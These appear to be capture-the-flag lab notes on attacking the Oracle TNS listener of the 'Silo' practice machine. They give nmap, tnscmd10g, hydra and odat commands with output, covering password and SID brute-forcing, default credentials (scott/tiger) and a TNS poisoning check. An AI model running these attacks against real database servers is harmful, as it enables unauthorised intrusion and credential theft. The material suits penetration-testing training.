4: 1521 Oracle TNS listener

$ nmap --script "oracle-tns-version" -p 1521 -T4 -sV silo.htb
PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

# checking with tnscmd10g
$ tnscmd10g status -h silo.htb
sending (CONNECT_DATA=(COMMAND=status)) to silo.htb:1521
writing 89 bytes
reading
.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))

# more information about error codes
| https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7
# if the TNS versions are incompatible, retry with the --10G flag

$ tnscmd10g status -h silo.htb --10G
sending (CONNECT_DATA=(CID=(PROGRAM=)(HOST=linux)(USER=oracle))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=169869568)) to silo.htb:1521
writing 181 bytes
reading
.e......"..Y(DESCRIPTION=(TMP=)(VSNNUM=186647040)(ERR=1189)(ERROR_STACK=(ERROR=(CODE=1189)(EMFI=4))))

# TNS error 1189: the listener could not authenticate the user.
# trying to brute-force the listener password with hydra
$ hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 silo.htb oracle-listener
# PREFER RUNNING odat tnscmd -s silo.htb -p 1521 --[command]

$ odat tnscmd -s silo.htb -p 1521 --version
[1] (10.10.10.82:1521): Searching the version of the Oracle database server (10.10.10.82) listening on the port 1521
[+] The remote database version is: '11.2.0.2.0.'
# this version is vulnerable to offline brute-force

# sid enumeration
$ odat sidguesser -s "silo.htb" -p 1521 [--sids-file=/opt/oracle-tns/sids-oracle.txt]
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

$ hydra -L /opt/oracle-tns/sids-oracle.txt -s 1521 silo.htb oracle-sid
[1521][oracle-sid] host: silo.htb
[1521][oracle-sid] host: silo.htb   login: CLRExtProc
[1521][oracle-sid] host: silo.htb   login: PLSExtProc
[1521][oracle-sid] host: silo.htb   login: XE
1 of 1 target successfully completed, 4 valid passwords found

# next: find a valid user:pass pair

# using 0xdf's script
$ python oracle-userpass-brute.py silo.htb oracle_default_userpass.txt
# needs a wordlist in the format user:pass
Found scott / tiger

[OR]
# needs a wordlist in the format user/pass
$ sudo odat passwordguesser -s silo.htb -p 1521 -d 'XE' --accounts-file $(pwd)/oracle_default_userpass.txt [--sysdba]

# we can run odat's automated scan (all modules)
$ odat all -s silo.htb -d XE -U SCOTT -P tiger --sysdba

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[truncated]
# a lot more information follows

Following the ODAT mind map: https://github.com/quentinhardy/odat#mind-map---odat--oracle-database-pentests
# also https://0xdf.gitlab.io/img/ODAT_main_features_v2.0.jpg
